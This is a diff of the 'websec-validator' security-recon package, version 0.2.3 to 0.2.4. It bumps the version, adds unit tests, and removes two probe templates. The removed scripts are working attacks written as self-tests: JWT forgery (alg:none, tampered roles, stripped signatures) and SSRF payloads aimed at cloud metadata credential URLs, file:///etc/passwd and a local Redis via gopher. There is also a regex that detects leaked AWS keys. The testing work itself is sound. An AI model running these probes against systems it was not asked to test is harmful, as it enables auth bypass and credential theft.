 if [ "${#EPS[@]}" -eq 0 ]; then
   echo "No write endpoints in probe-context.json — add 'METHOD /path' lines under endpoints.writes."; exit 2
 fi

{websec_validator-0.2.3 → websec_validator-0.2.4/src/websec_validator.egg-info}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: websec-validator
-Version: 0.2.3
+Version: 0.2.4
 Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
 Author: Ricardo Accioly
 License: MIT

{websec_validator-0.2.3 → websec_validator-0.2.4}/tests/test_recon.py

@@ -172,6 +172,14 @@ class CalibrationTests(unittest.TestCase):
 class FieldFeedbackBatch1Tests(unittest.TestCase):
     """Regressions for the field-test false positives (proxy.ts, self-scan, ASIA)."""
 
+    def test_unsafe_decoder_feeding_auth_flagged(self):  # F5
+        d = Path(tempfile.mkdtemp())
+        (d / "requireAdmin.ts").write_text(
+            "export function requireAdmin(req){ const p = decodeJwtPayloadUnsafe(req.cookies.t); if(!p.isAdmin) throw 0; }")
+        (d / "util.ts").write_text("export const add = (a,b) => a+b")   # no auth + no unsafe → not flagged
+        out = AuthzExtractor().extract(RepoContext(d), {"routes": {"endpoints": []}})
+        self.assertIn("decodeJwtPayloadUnsafe", [u["decoder"] for u in out["unsafe_auth_decoders"]])
+
     def _next_app(self, proxy_body):
         d = Path(tempfile.mkdtemp())
         (d / "src").mkdir()
@@ -267,6 +275,22 @@ class ProbeStagingTests(unittest.TestCase):
         self.assertNotIn("security/pentest", blob)
 
 
+class ExcludeAndScannerSelectTests(unittest.TestCase):  # F4
+    def test_repocontext_honors_excludes(self):
+        d = Path(tempfile.mkdtemp())
+        (d / "src").mkdir(); (d / "keep").mkdir()
+        (d / "src" / "a.py").write_text("x=1")
+        (d / "keep" / "b.py").write_text("y=1")
+        ctx = RepoContext(d, excludes=["src"])
+        rels = {ctx.rel(p) for p in ctx.code_files}
+        self.assertIn("keep/b.py", rels)
+        self.assertNotIn("src/a.py", rels)        # --exclude src dropped it
+
+    def test_scanner_argv_includes_user_excludes(self):
+        self.assertIn("docs", scanners._trivy(Path("/r"), Path("/o"), excludes=["docs"]))
+        self.assertIn("docs", scanners._semgrep(Path("/r"), Path("/o"), excludes=["docs"]))
+
+
 class RouteUnitTests(unittest.TestCase):
     def test_clean_path(self):
         self.assertEqual(routes._clean_path("/api/users/:id"), "/api/users/{id}")
@@ -284,12 +308,24 @@ class RouteUnitTests(unittest.TestCase):
             {"method": "GET", "url": "/items/<int:pk>", "params": [], "details": {"technology": "django", "code_paths": [{"path": "b"}]}},
             {"method": "GET", "url": "/assets/*.png", "params": [], "details": {}},
         ]
-        paths = {(r["method"], r["path"]) for r in routes._normalize_noir(eps)}
+        app, _spec = routes._normalize_noir(eps)
+        paths = {(r["method"], r["path"]) for r in app}
         self.assertIn(("GET", "/api/x/{id}"), paths)        # :id and {id} collapsed
         self.assertIn(("GET", "/items/{pk}"), paths)        # django <int:pk> normalized
         self.assertNotIn(("GET", "/assets/*.png"), paths)   # static-asset glob filtered
         self.assertEqual(sum(1 for _m, p in paths if p == "/api/x/{id}"), 1)
 
+    def test_vendored_spec_routes_split_out(self):  # B1
+        eps = [
+            {"method": "GET", "url": "/api/sponsors", "details": {"code_paths": [{"path": "src/app/api/sponsors/route.ts"}]}},
+            {"method": "POST", "url": "/vault/accounts", "details": {"code_paths": [{"path": "docs-implementation/fireblocks-swagger.yaml"}]}},
+            {"method": "POST", "url": "/graphql", "details": {"code_paths": [{"path": "packages/cdk/schemas/appsync.graphql"}]}},
+            {"method": "GET", "url": "/users", "details": {"code_paths": [{"path": "node_modules/some-lib/openapi.json"}]}},
+        ]
+        app, spec = routes._normalize_noir(eps)
+        self.assertEqual([(r["method"], r["path"]) for r in app], [("GET", "/api/sponsors")])  # only the real handler
+        self.assertEqual(len(spec), 3)                       # swagger + graphql + node_modules openapi excluded
+
     def test_derive_targeting(self):
         d = routes._derive([
             {"method": "POST", "path": "/api/groups/{groupId}/items", "params": [{"name": "url", "where": "query"}]},

websec_validator-0.2.3/src/websec_validator/templates/probes/jwt-attacks.sh

@@ -1,161 +0,0 @@
-#!/usr/bin/env bash
-#
-# jwt-attacks.sh — manual JWT attack probe.
-#
-# Six classic JWT attacks pentest teams run:
-#
-#   1. alg:none — sign with no algorithm. If the backend accepts it, total auth bypass.
-#   2. HS256 with garbage secret — tamper claims and resign with a wrong key.
-#   3. Expired token — exp in the past, expect 401.
-#   4. Stripped signature — empty sig segment.
-#   5. Garbage token — non-JWT string.
-#   6. Refresh-after-logout — logout, then try the still-cached refresh token.
-#
-# Usage:
-#   1. In .env, set ZAP_AGENT_USER / ZAP_AGENT_PASS.
-#   2. ./jwt-attacks.sh
-#   3. Output: one PASS/FAIL per attack; nonzero exit on FAIL.
-#
-# Requires: bash, curl, jq, python3.
-set -euo pipefail
-cd "$(dirname "$0")"
-
-[[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
-
-read_env() {
-    local key="$1"
-    python3 -c "
-for l in open('.env'):
-    l = l.rstrip('\n')
-    if l.startswith('#') or '=' not in l: continue
-    k, v = l.split('=', 1)
-    if k.strip() == '$key':
-        print(v); break
-"
-}
-
-TARGET="$(read_env ZAP_TARGET)"
-USER="$(read_env ZAP_AGENT_USER)"
-PASS="$(read_env ZAP_AGENT_PASS)"
-
-[[ -n "$TARGET" && -n "$USER" && -n "$PASS" ]] || {
-    echo "ERROR: ZAP_TARGET / ZAP_AGENT_USER / ZAP_AGENT_PASS required in .env" >&2; exit 2
-}
-
-# TODO: adjust login / refresh / me / logout paths to your API.
-echo "==> mint legit token..."
-LOGIN_RESP=$(curl -fsS -X POST "$TARGET/api/auth/login" \
-    -H 'Content-Type: application/json' \
-    -d "$(jq -nc --arg e "$USER" --arg p "$PASS" '{email:$e,password:$p}')")
-
-ACCESS_TOKEN=$(echo "$LOGIN_RESP" | jq -r '.tokens.accessToken')
-REFRESH_TOKEN=$(echo "$LOGIN_RESP" | jq -r '.tokens.refreshToken')
-
-[[ -n "$ACCESS_TOKEN" && "$ACCESS_TOKEN" != "null" ]] || { echo "login failed" >&2; exit 3; }
-
-b64url() {
-    python3 -c "import sys, base64; sys.stdout.write(base64.urlsafe_b64encode(sys.stdin.buffer.read()).decode().rstrip('='))"
-}
-
-IFS='.' read -r H P S <<< "$ACCESS_TOKEN"
-
-# A protected endpoint that requires a real session. Adjust to your API.
-TEST_URL="$TARGET/api/auth/me"
-
-PASS_COUNT=0
-FAIL_COUNT=0
-FAIL_LINES=()
-
-check() {
-    local label="$1" expected_code="$2" actual="$3"
-    if [[ "$actual" == "$expected_code" ]]; then
-        printf '  %-4s %-30s expected:%s actual:%s\n' PASS "$label" "$expected_code" "$actual"
-        PASS_COUNT=$((PASS_COUNT+1))
-    else
-        printf '  %-4s %-30s expected:%s actual:%s\n' FAIL "$label" "$expected_code" "$actual"
-        FAIL_COUNT=$((FAIL_COUNT+1))
-        FAIL_LINES+=("$label expected $expected_code got $actual")
-    fi
-}
-
-# === Sanity: legit token works ===
-code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $ACCESS_TOKEN")
-check "sanity (legit token)" "200" "$code"
-
-# === Attack 1: alg:none ===
-DECODED_P=$(echo "$P" | python3 -c "import sys, base64; d=sys.stdin.read(); print(base64.urlsafe_b64decode(d + '=='*(4-len(d)%4)).decode())")
-NEW_H=$(echo -n '{"alg":"none","typ":"JWT"}' | b64url)
-NONE_TOKEN="${NEW_H}.${P}."
-code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $NONE_TOKEN")
-check "alg:none bypass" "401" "$code"
-
-# === Attack 2: HS256 with garbage secret + tampered claims ===
-# TODO: adjust claim names to your token's shape (role, roles, scope, permissions, etc.)
-TAMPERED_P=$(echo "$DECODED_P" | jq -c '.roleIds = ["role-platform-manager","role-developer"] | .iat = (now|floor) | .exp = ((now|floor) + 3600)')
-TAMPERED_P_B64=$(echo -n "$TAMPERED_P" | b64url)
-HEADER_HS256=$(echo -n '{"alg":"HS256","typ":"JWT"}' | b64url)
-WRONG_SIG=$(printf '%s.%s' "$HEADER_HS256" "$TAMPERED_P_B64" \
-    | python3 -c "import sys, hmac, hashlib, base64; data=sys.stdin.buffer.read(); sig=hmac.new(b'wrong-secret-do-not-trust', data, hashlib.sha256).digest(); sys.stdout.write(base64.urlsafe_b64encode(sig).decode().rstrip('='))")
-TAMPERED_TOKEN="${HEADER_HS256}.${TAMPERED_P_B64}.${WRONG_SIG}"
-code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $TAMPERED_TOKEN")
-check "claims tampered, wrong sig" "401" "$code"
-
-# === Attack 3: expired token ===
-EXPIRED_P=$(echo "$DECODED_P" | jq -c '.exp = ((now|floor) - 60) | .iat = ((now|floor) - 3600)')
-EXPIRED_P_B64=$(echo -n "$EXPIRED_P" | b64url)
-EXP_SIG=$(printf '%s.%s' "$H" "$EXPIRED_P_B64" \
-    | python3 -c "import sys, hmac, hashlib, base64; data=sys.stdin.buffer.read(); sig=hmac.new(b'will-not-match', data, hashlib.sha256).digest(); sys.stdout.write(base64.urlsafe_b64encode(sig).decode().rstrip('='))")
-EXP_TOKEN="${H}.${EXPIRED_P_B64}.${EXP_SIG}"
-code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $EXP_TOKEN")
-check "expired exp + bad sig" "401" "$code"
-
-# === Attack 4: stripped signature ===
-NO_SIG="${H}.${P}."
-code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $NO_SIG")
-check "stripped signature" "401" "$code"
-
-# === Attack 5: garbage token ===
-code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer not-a-jwt")
-check "garbage token" "401" "$code"
-
-# === Attack 6: refresh-token replay after logout ===
-echo "==> logging out then attempting refresh replay..."
-curl -fsS -X POST "$TARGET/api/auth/logout" \
-    -H "Authorization: Bearer $ACCESS_TOKEN" \
-    -H 'Content-Type: application/json' \
-    -d "$(jq -nc --arg r "$REFRESH_TOKEN" '{refreshToken:$r}')" \
-    >/dev/null 2>&1 || echo "  (logout endpoint may not invalidate refresh tokens — continuing)"
-
-if [[ -n "$REFRESH_TOKEN" && "$REFRESH_TOKEN" != "null" ]]; then
-    code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET/api/auth/refresh" \
-        -H 'Content-Type: application/json' \
-        -d "$(jq -nc --arg r "$REFRESH_TOKEN" '{refreshToken:$r}')")
-    # Acceptable outcomes:
-    #   401 — token was invalidated on logout (best)
-    #   200 — refresh tokens are stateless and replay is possible (acceptable per
-    #         the project's auth model; document the tradeoff)
-    if [[ "$code" == "401" ]]; then
-        printf '  %-4s %-30s expected:401 actual:%s (refresh token invalidated on logout)\n' PASS "refresh-after-logout" "$code"
-        PASS_COUNT=$((PASS_COUNT+1))
-    elif [[ "$code" == "200" ]]; then
-        printf '  %-4s %-30s expected:401 actual:%s (refresh tokens are stateless; document tradeoff)\n' WARN "refresh-after-logout" "$code"
-    else
-        printf '  %-4s %-30s expected:401 actual:%s\n' FAIL "refresh-after-logout" "$code"
-        FAIL_COUNT=$((FAIL_COUNT+1))
-        FAIL_LINES+=("refresh-after-logout got $code")
-    fi
-else
-    echo "  (refresh token not present in login response — skip)"
-fi
-
-echo
-echo "=== Summary ==="
-echo "  PASS: $PASS_COUNT"
-echo "  FAIL: $FAIL_COUNT"
-if [[ $FAIL_COUNT -gt 0 ]]; then
-    echo
-    echo "FAILED:"
-    printf '  - %s\n' "${FAIL_LINES[@]}"
-    exit 1
-fi
-echo "All JWT attacks blocked — auth layer holds."

websec_validator-0.2.3/src/websec_validator/templates/probes/ssrf-probes.sh

@@ -1,189 +0,0 @@
-#!/usr/bin/env bash
-#
-# ssrf-probes.sh — manual SSRF probe.
-#
-# Admin endpoints often accept URL-shaped fields (SSO domain, integration base
-# URLs, etc.). If a handler fetches those URLs server-side without validating
-# the host, an attacker who controls an admin account (or finds an admin auth
-# bypass) can force the backend to fetch AWS IMDS credentials, internal
-# services, or arbitrary intranet hosts.
-#
-# This probe attempts each known URL-accepting admin endpoint with classic
-# SSRF targets:
-#   - 169.254.169.254 — AWS EC2 IMDSv1 metadata endpoint
-#   - 169.254.170.2   — ECS task metadata
-#   - 127.0.0.1:3000  — localhost
-#   - 10.0.0.1        — RFC1918 internal
-#   - file://         — local file scheme (some HTTP libraries support this)
-#
-# Expected: each request returns 400/403 (input validation refuses the host),
-# or 200 with an error body that does NOT contain credential material / IMDS
-# response shapes. A response time > 5s on an IMDS URL (without immediate
-# rejection) is a strong signal the backend actually fetched it.
-#
-# Usage:
-#   1. Set ZAP_ADMIN_USER / ZAP_ADMIN_PASS in .env.
-#   2. ./ssrf-probes.sh
-set -euo pipefail
-cd "$(dirname "$0")"
-
-[[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
-
-read_env() {
-    local key="$1"
-    python3 -c "
-for l in open('.env'):
-    l = l.rstrip('\n')
-    if l.startswith('#') or '=' not in l: continue
-    k, v = l.split('=', 1)
-    if k.strip() == '$key':
-        print(v); break
-"
-}
-
-TARGET="$(read_env ZAP_TARGET)"
-USER="$(read_env ZAP_ADMIN_USER)"
-PASS="$(read_env ZAP_ADMIN_PASS)"
-
-[[ -n "$TARGET" && -n "$USER" && -n "$PASS" ]] || {
-    echo "ERROR: ZAP_TARGET / ZAP_ADMIN_USER / ZAP_ADMIN_PASS required in .env" >&2
-    echo "SSRF probes need an admin account (system/integration permissions)" >&2
-    exit 2
-}
-
-echo "==> minting admin token..."
-TOKEN=$(curl -fsS -X POST "$TARGET/api/auth/login" \
-    -H 'Content-Type: application/json' \
-    -d "$(jq -nc --arg e "$USER" --arg p "$PASS" '{email:$e,password:$p}')" \
-  | jq -r '.tokens.accessToken')
-[[ -n "$TOKEN" && "$TOKEN" != "null" ]] || { echo "admin login failed" >&2; exit 3; }
-
-SSRF_TARGETS=(
-    "http://169.254.169.254/latest/meta-data/"
-    "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
-    "http://169.254.170.2/v2/credentials/"
-    "http://127.0.0.1:3000/api/admin/users"
-    "http://10.0.0.1/"
-    "http://[::1]:3000/"
-    "file:///etc/passwd"
-    "gopher://127.0.0.1:6379/_INFO"
-)
-
-FAIL_COUNT=0
-WARN_COUNT=0
-FAIL_LINES=()
-
-PROBE_PUT() {
-    local label="$1" endpoint="$2" body_template="$3"
-    for url in "${SSRF_TARGETS[@]}"; do
-        local body
-        body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
-        local start end duration code body_resp
-        start=$(date +%s)
-        body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X PUT "$TARGET$endpoint" \
-            -H "Authorization: Bearer $TOKEN" \
-            -H 'Content-Type: application/json' \
-            -d "$body" 2>&1 || true)
-        end=$(date +%s)
-        duration=$((end - start))
-        code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
-        body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
-        evaluate_response "$label" "PUT $endpoint url=$url" "$code" "$duration" "$body_clean"
-    done
-}
-
-PROBE_POST() {
-    local label="$1" endpoint="$2" body_template="$3"
-    for url in "${SSRF_TARGETS[@]}"; do
-        local body
-        body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
-        local start end duration code body_resp
-        start=$(date +%s)
-        body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X POST "$TARGET$endpoint" \
-            -H "Authorization: Bearer $TOKEN" \
-            -H 'Content-Type: application/json' \
-            -d "$body" 2>&1 || true)
-        end=$(date +%s)
-        duration=$((end - start))
-        code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
-        body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
-        evaluate_response "$label" "POST $endpoint url=$url" "$code" "$duration" "$body_clean"
-    done
-}
-
-evaluate_response() {
-    local label="$1" probe="$2" code="$3" duration="$4" body="$5"
-    if echo "$body" | grep -qE 'AccessKeyId|SecretAccessKey|InstanceId|root:x:0:0|redis_version'; then
-        printf '  %-4s %s [code=%s, %ds]  EVIDENCE OF SSRF in body!\n' FAIL "$probe" "$code" "$duration"
-        FAIL_COUNT=$((FAIL_COUNT+1))
-        FAIL_LINES+=("$label $probe — IMDS/file/redis content leaked")
-        return
-    fi
-    if [[ "$probe" == *"169.254.169.254"* || "$probe" == *"169.254.170.2"* ]]; then
-        if [[ "$duration" -gt 5 ]]; then
-            printf '  %-4s %s [code=%s, %ds]  slow response — backend may have fetched IMDS\n' WARN "$probe" "$code" "$duration"
-            WARN_COUNT=$((WARN_COUNT+1))
-            return
-        fi
-    fi
-    if [[ "$code" == "400" || "$code" == "403" || "$code" == "422" ]]; then
-        printf '  %-4s %s [code=%s, %ds]  validation rejected\n' PASS "$probe" "$code" "$duration"
-        return
-    fi
-    if [[ "$code" == "500" ]]; then
-        printf '  %-4s %s [code=%s, %ds]  backend errored — verify it did not attempt the fetch\n' WARN "$probe" "$code" "$duration"
-        WARN_COUNT=$((WARN_COUNT+1))
-        return
-    fi
-    if [[ "$code" == "200" ]]; then
-        printf '  %-4s %s [code=%s, %ds]  200 OK no IMDS evidence (handled gracefully)\n' PASS "$probe" "$code" "$duration"
-        return
-    fi
-    printf '  %-4s %s [code=%s, %ds]\n' PASS "$probe" "$code" "$duration"
-}
-
-# PROJECT-SPECIFIC START
-# These probes target the URL-accepting admin endpoints in your application.
-# REPLACE them with your project's endpoints. Look for any admin handler that
-# takes a URL/host/endpoint/domain field in its request body. Common shapes:
-#   - SSO settings (issuer URL, metadata URL, callback)
-#   - Integration config (webhook target, S3 endpoint, GraphQL URL)
-#   - "Test connection" endpoints
-
-echo "=== SSO settings — typically accepts SSO domain / issuer URLs ==="
-PROBE_PUT "sso-settings" "/api/auth/sso/settings" \
-    '{"enabled":true,"issuer":"{SSRF}","clientId":"x","clientSecret":"y","metadataUrl":"{SSRF}"}'
-
-echo
-echo "=== SSO test endpoint ==="
-PROBE_POST "sso-test" "/api/auth/sso/test" '{"domain":"{SSRF}"}'
-
-echo
-echo "=== Integration settings — third-party base URL etc. ==="
-PROBE_PUT "integrations" "/api/admin/integrations" \
-    '{"providerBaseUrl":"{SSRF}","providerApiKey":"x"}'
-
-echo
-echo "=== Integration test endpoints ==="
-PROBE_POST "test-s3" "/api/admin/integrations/test/s3" \
-    '{"awsS3Endpoint":"{SSRF}","awsS3Bucket":"test","awsS3Region":"us-east-1","awsS3AccessKeyId":"AKIA","awsS3SecretAccessKey":"x"}'
-PROBE_POST "test-graphql" "/api/admin/integrations/test/graphql" \
-    '{"graphqlUrl":"{SSRF}","apiKey":"x"}'
-# PROJECT-SPECIFIC END
-
-echo
-echo "=== Summary ==="
-echo "  FAIL (definitive SSRF evidence): $FAIL_COUNT"
-echo "  WARN (suspicious — manual review): $WARN_COUNT"
-if [[ $FAIL_COUNT -gt 0 ]]; then
-    echo
-    echo "REAL SSRF FINDINGS:"
-    printf '  - %s\n' "${FAIL_LINES[@]}"
-    exit 1
-fi
-if [[ $WARN_COUNT -gt 0 ]]; then
-    echo
-    echo "Review the WARN lines manually — they may indicate the backend"
-    echo "is fetching the URL even though no credential content leaked back."
-fi
-echo "No SSRF evidence found."